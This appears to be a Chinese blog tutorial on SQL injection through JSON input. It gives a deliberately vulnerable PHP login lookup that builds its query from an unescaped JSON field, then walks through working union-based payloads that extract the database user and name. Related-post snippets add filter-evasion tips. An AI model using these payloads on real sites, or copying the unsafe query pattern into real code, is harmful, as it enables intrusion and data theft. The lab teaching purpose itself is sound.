9-sql注入之json注入

最新推荐文章于 2024-04-26 15:30:51 发布
最新推荐文章于 2024-04-26 15:30:51 发布
阅读量1.1k 收藏 20
点赞数 27
分类专栏: SQL注入 文章标签: sql json 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62978778/article/details/136745746
版权

文章目录

SQL注入之json注入

本章学习目的:

1.了解什么json数据格式

2.了解json注入的方式

3.了解什么场景下会使用json进行注入

1.什么是json?

JSON(JavaScript Object Notation, JS对象简谱)是一种轻量级的数据交换格式。它基于 ECMAScript(European Computer Manufacturers Association, 欧洲计算机协会制定的js规范)的一个子集,采用完全独立于编程语言的文本格式来存储和表示数据。

json的数据类型:

image.png

创建一个json对象
const jsonStr ='{"name":"mc","age":18,"sex":"男"}'
const jsonObject = JSON.parse(jsonStr);

输出解析json数据
Object.keys(jsonObject).forEach(item=>{console.log(item,":",jsonObject[item])})

转换成json字符串
const toJSON = JSON.stringify(jsonObject);console.log(toJSON);

2.json注入

原理:JSON注入是指应用程序所解析的JSON数据来源于不可信赖的数据源,程序没有对这些不可信赖的数据进行验证、过滤,如果应用程序使用未经验证的输入构造JSON,则可以更改JSON 数据的语义。

危害:
攻击者可以利用JSON注入漏洞在JSON数据中插入元素,从而允许JSO数据对业务非常关键的值执行恶意操作,获取管理权限等
严重的可能导致XSS和动态解析代码

防御:
检查程序逻辑,根据实际需求对数据进行合理过滤和安全校验,以避免产生JSON注使用JSON标准对JSON 数据进行处理,防止JSON注入

3.案例演示

1.php源码:
<?php
  // php防止中文乱码
  header('content-type:text/html;charset=utf-8');
  
  if(isset($_POST['json'])){
    $json_str=$_POST['json'];
    $json=json_decode($json_str);
    if(!$json){
      die('JSON文档格式有误,请检查');
    }
    $username=$json->username;
    //$password=$json->password;
 
    // 建立mysql连接,root/root连接本地数据库
    $mysqli=new mysqli();
    $mysqli->connect('localhost','root','root');
    if($mysqli->connect_errno){
      die('数据库连接失败:'.$mysqli->connect_error);
    }

    // 要操作的数据库名,我的数据库是security
    $mysqli->select_db('security');
    if($mysqli->errno){
      dir('打开数据库失败:'.$mysqli->error);
    }

    // 数据库编码格式
    $mysqli->set_charset('utf-8');

    // 从users表中查询username,password字段
    $sql="SELECT username,password FROM users WHERE username='{$username}'";
    $result=$mysqli->query($sql);
    if(!$result){
      die('执行SQL语句失败:'.$mysqli->error);
    }else if($result->num_rows==0){
      die('查询结果为空');
    }else {
      $array1=$result->fetch_all(MYSQLI_ASSOC);
      echo "用户名:{$array1[0]['username']},密码:{$array1[0]['password']}";
    }

    // 释放资源
    $result->free();
    $mysqli->close();
  }
?>
2.进行注入

1、按照特定的数据格式查询admin用户密码

json={“username”:“admin”}

image.png

2、查看源代码,构造payload

image.png

代码中的sql语句是这个样子的

构造payload进行注入

json={“username”:“admin’ order by 3#”}

3、判断当前数据库有多少列

2正常,3报错,判断当前数据库有2列

4、注入带出来数据

json={“username”:“admin’ and 1=2 union select 1,2#”}

json={“username”:“admin’ and 1=2 union select user(),database()#”}

星星程序猿
关注
  • 27
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
mysql-querier:使用简单的JSON从MySQL查询,并防止SQL注入攻击
05-13
mysql查询器 使用简单的JSON从MySQL查询,并防止SQL注入攻击 例子 querier = require 'mysql-querier' userQuerier = querier 'users', user_id: number: true role: enum: ['admin', 'user'] app.get '/user/query', (req, res) -> mysql.query userQuerier(req.query), (err, rows) -> res.json rows 细绳 查询者: userQuerier = querier 'users', name: string: true 询问: {} // SELECT * FROM `users` {"name": "jysperm"} //
SQL注入 SQL Injection
03-19
SQL注入的知识,SQL注入的知识, 国外的一本详细介绍了SQL注入的一本书
JSON类型注入
2201_75766364的博客
03-29 1067
JSON 是存储和交换文本信息的语法,是轻量级的文本数据交换格式。类似xml,但JSON 比 XML 更小、 更快,更易解析,主要是用来代替XML的。所以现在接口数据传输都采用json方式进行。JSON 文本的 MIME 类型是 "application/json"。
sqlmap——json注入
mingyqf的博客
11-12 3836
现在越来越多的网站开始使用 RESTFUL 框架,数据传输使用 JSON,那么这种情况下我们如何使用 SQLmap 进行自动化注入呢? 能使用 * 指定注入点吗? 先说结论:对于 JSON 数据的 SQL 注入使用 * 是错误的! 首先需要着重强调一下,网上有很多文章说可以使用*来指定注入点,但经过我的实测,SQLmap 发送的数据包会被强制转换为普通格式。 我们可以使用-vvv参数来查看 SQLmap 发送的测试数据: sqlmap -u https://www.example.com —data {“e
SQL注入漏洞全接触——高级篇.txt
02-13
看完入门篇和进阶篇后,稍加练习,破解一般的网站是没问题了。但如果碰到表名列名猜不到,或程序作者过滤了一些特殊字符,怎么提高注入的成功率?怎么样提高猜解效率?请大家接着往下看高级篇。 1.有些人会过滤Select、Update、Delete这些关键字,但偏偏忘记区分大小写,所以大家可以用selecT这样尝试一下。 2.在猜不到字段名时,不妨看看网站上的登录表单,一般为了方便起见,字段名都与表单的输入框取相同的名字。  3.特别注意:地址栏的+号传入程序后解释为空格,%2B解释为+号,%25解释为%号,具体可以参考URLEncode的相关介绍。 4.用Get方法注入时,IIS会记录你所有的提交字符串,对Post方法做则不记录,所以能用Post的网址尽量不用Get。 5. 猜解Access时只能用Ascii逐字解码法,SQLServer也可以用这种方法,只需要两者之间的区别即可,但是如果能用SQLServer的报错信息把值暴露出来,那效率和准确率会有极大的提高
sql注入
leekos的博客,分享web安全相关知识~
12-06 1837
sql提交注入
SQL注入类型及提交注入
山兔的博客
06-12 906
注入之前,我们要明白两件事情,那就是数据库类型、提交方法,因为数据库类型不同的话,注入方法也不同。#简要明确参数类型数字、字符:非数字就是字符,字符的输入是要用引号括起来,这个时候我们在注入的时候,就需要考虑到符号的问题。如果我们输入字符串,没有使用单引号括起来,那就是单纯的输入字符,这是没有意义的,形成不了逻辑判断。如果在实战当中,我们看到数字型的输入,也有可能是字符型的,因为它输入的时候,后台可能用单引号进行包裹,注入类型是什么要看后台的一个SQL语句的写入。
小迪安全-sql注入-笔记
感恩
09-19 460
小迪安全-sql注入-笔记
12.SQL漏洞-注入类型&请求方法注入
mingyqf的博客
03-20 3943
参数类型】 1、数字类型 select * from user where id=1 2、字符类型 select * from user where name=‘yucedu’ 过滤’(单引号)和"(双引号) 3、搜索类型 select * from user where name like ‘%yucedu%’ 只要有yucedu都会被搜索出来 过滤%(百分号)和’(单引号) 4、JSON类型 ★post提交方式中的一种数据交互格式 JSON格式: json={“name”:“yucedu” “a
基于JSONSQL注入攻击触发需要更新Web应用程序防火墙
网络研究观
12-13 8389
安全研究人员开发了一种通用的 SQL 注入技术,可以绕过多个 Web 应用程序防火墙 (WAF)。问题的核心是 WAF 供应商未能在 SQL 语句中添加对 JSON 的支持,从而使潜在的攻击者可以轻松隐藏其恶意负载。
sql高级注入,advanced_sql_injection
08-20
一年多前在网上转悠时遇到的。当时网站的很多信息都从头到尾大概看一遍,现在遇到sql注入及相关问题了。再回头来看看。希望这个网站对大家有所帮助 网站 http://www.sqlsecurity.com/
sql-next:Node具有json查询和现代api的Node.js的Mysql客户端
02-03
SQL-next是的包装器,它提供MongoDB之类的查询和基于Promise的api。 产品特点 JSON查询 防止SQL注入 选择器(尚未完成) 基于承诺的API 结帐,看看会发生什么。 正在安装 $ npm install sql-next 快速开始 查找项目的示例: import { Client , IConfig } from 'sql-next' ; const config : IConfig = { host : 'example.com' , user : 'username' , password : '123' , port : 8080 , } ; interface Item { _id : number ; header : string ; body : string ; } async function init ( ) { const client = new Client ( ) ; await client . connect ( config ) ; console . log ( 'Connec
第14天:WEB漏洞-SQL注入之类型及提交注入1
08-03
#简要明确参数类型数字,字符,搜索,JSON 等#简要明确请求方法GET,POST,COOKIE,REQUEST,HTTP 头等其中 SQL 语句干扰符号:',
Validation-for-SQL-Injection:验证SQL注入
03-26
Flask API,用于净化输入 路线 家 (/) API返回包含所有ascii字符的字符集。 原料药 检查经过清理的有效负载(/ api / v1 / sanitized / input /) 路径- /api/v1/sanitized/input/类型POST 有效输入 样本输入 curl -X POST https://iu8utrspej.execute-api.us-west-2.amazonaws.com/production/api/v1/sanitized/input/ \ --header "Content-Type: application/json" \ --data '{"payload": "Foo"}' 样本输出 {"result":"unsanitized"} 输入无效 样本输入 curl -X POST https://iu8utrspej.e
JsonSQL:用SQL语句解析JSON文件
06-19
SQL语法,当然只能用简单的条件查询咯,不过这个用起比较简单,容易上手
sql注入高级
01-11
了解丌同数据库注入以及注入的类型,比如select注入,insert注入json注入,一些注入防护代码等等。 了解及学习注入绕过的手法,掌握服务器,应用,数据库的bypass 手法,学会编写bypass waf代码 。
SQL Server详细使用教程
qq_43341279的博客
04-20 743
本文详细介绍了SQL Server的使用教程,包括安装与配置、创建数据库和数据表、数据的增删改查等操作。同时,本文还介绍了数据库备份与还原以及数据库优化与维护等方面的知识,帮助用户提高数据库的稳定性和性能。在实际应用中,用户可以根据具体需求灵活运用SQL Server的各项功能,实现企业级数据管理的高效运作。它具备高性能、可扩展性、易用性等特点,是企业数据存储和处理的重要工具。本文将详细介绍SQL Server的使用教程,包括安装、配置、创建数据库、数据表、以及数据的增删改查等操作。九、数据库备份与还原。
oracle sql monitor简单使用说明
最新发布
雅冰石的专栏
04-26 210
activity活动这里显示时间大多花在了哪里。
json格式sql注入
09-15
JSON格式的SQL注入是指应用程序所解析的JSON数据来源于不可信赖的数据源,而应用程序没有对这些不可信赖的数据进行验证和过滤。攻击者可以通过在JSON数据中插入恶意的SQL语句,来修改SQL查询的语义,进而对数据库进行非法操作。与传统的SQL注入类似,JSON格式的SQL注入也需要对影响语句的内容进行转义,例如双引号、花括号等。为了防止JSON格式的SQL注入,开发人员应该对从JSON数据中提取的参数进行严格的验证和过滤,以确保只接受可信的数据。此外,使用安全的编程语言和框架,避免拼接SQL语句,而是使用参数化查询等安全的数据库操作方式也是有效的预防措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

星星程序猿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值